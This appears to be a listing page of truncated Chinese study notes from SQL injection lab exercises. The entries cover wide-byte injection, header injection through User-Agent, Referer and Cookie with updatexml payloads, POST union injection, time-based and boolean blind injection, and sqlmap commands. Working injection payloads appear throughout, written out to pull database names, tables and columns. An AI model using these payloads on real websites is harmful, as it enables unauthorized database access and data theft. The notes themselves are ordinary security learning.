6.3.3-SQL注入-宽字节注入Rank 3 笔记
需要宽字节注入找字段。2个查当前数据库名字查表查字段查数据查库,查表uname=1%df%27 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23 &passwd=&submit=Submitun
6.3.-SQL注入-宽字节注入 1-2-3 ---温故而知新
第一步第二步: 发现\第三步宽字节注入原理:利用 %df 吃到 %5c 形成 %df%5c(运)细节:%df ”------被url转码成-----%df%22------被php,magic-quotes转码成--------------%df%5c%22---------被gbk转码成----運”-------------------------------------------------
6.5.3-SQL注入-Header注入Rank 3 --学习笔记
删除你的COOKIE或者 等它期满。Cookie: uname=zkz' and updatexml("",concat(0x7e,(select database())),1)#放入cookie 注入页面有回显。security放入两条语句试试:Cookie: uname=zkz' and updatexml("",concat(0x7e,
6.5.2-SQL注入-Header注入Rank 2 ---学习笔记
这一题 和第一题有点区别,区别在于拼接数据或者注入点在请求头referer位置。下图是第一题user-agent 1' and updatexml("",concat(0x7e,(select version())),1))# 尝试注入获取数据库版本#############################这个是我1' and
6.5.1-SQL注入-Header注入--谢谢桑桑格老师。
因为页面回显我的请求头信息。这里就直接拼接user-agent代理人信息注入了。在表单中 输入 00 00 , 00 zkz, zkz,zkz 进行抓包,在user-agent里 注入 1' and updatexml(1,concat(0x7e,database()),1),",")# 爬出 数据库
SQL注入-Post注入系列
看到图标首先想到的就是,有表单and 输入点,输出点。下图是第三题的,注意输入输出控制。两个地方都可以随意输。 注意闭合那么这三提都是一样的了。1' and 1=3 union select version(),database()#1' and 1=3 union select 1,group_concat(table_name) from informa
令狐冲--6.4.1-3延时注入系列--学习心得
第一步注入点判断 and两边都是ture 对于了其他学长,相同的输入?id=1' and sleep(7) 他们有回显。。。个人理解: id=1' and sleep(7) 和上图1语句一样,都被执行了。只是没有回显。执行结果就是 chrome 反馈了8.08s.第二部:执行sleep 为
令狐冲--6.2.2-SQL注入-盲注Rank 2
6.2.2-SQL注入-和第一题做法一样,还是不推荐钻尖。想办法了解盲注机制,工具还的要用的。这题 输入?id=3 结果反馈 true且 结果中3被“”闭合。sqlmap用到的命令分别是:--current-db---tables -D "security" --columns "zkaq" -D "security"
令狐冲--6.2.1-SQL注入-盲注Rank 1--学习心得!!!
首先,如果没有看过聂风老师说的视频。和对着同学的社区帖子做一次。我绝逼不会做的。哈哈!第一步:找注入点第二步注意闭合语句第三步 order by 第四步 ?id=2' and (ascii(substr(database(),1,1)))=115; --+ 我是练手验证盲注的。 。。。 &nbs
令狐冲--6.11-6.14 --新手做题总结!!!
第一题6.1.1 id=0SELECT* FROM users WHERE id='0' LIMIT 0,1 注入:?id=0'and 1=2 union select 1,2,version()--+原来的Id=‘0’是闭合的,注入加‘ 是为了去掉注释状态!!! SELECT * FROM users WHERE i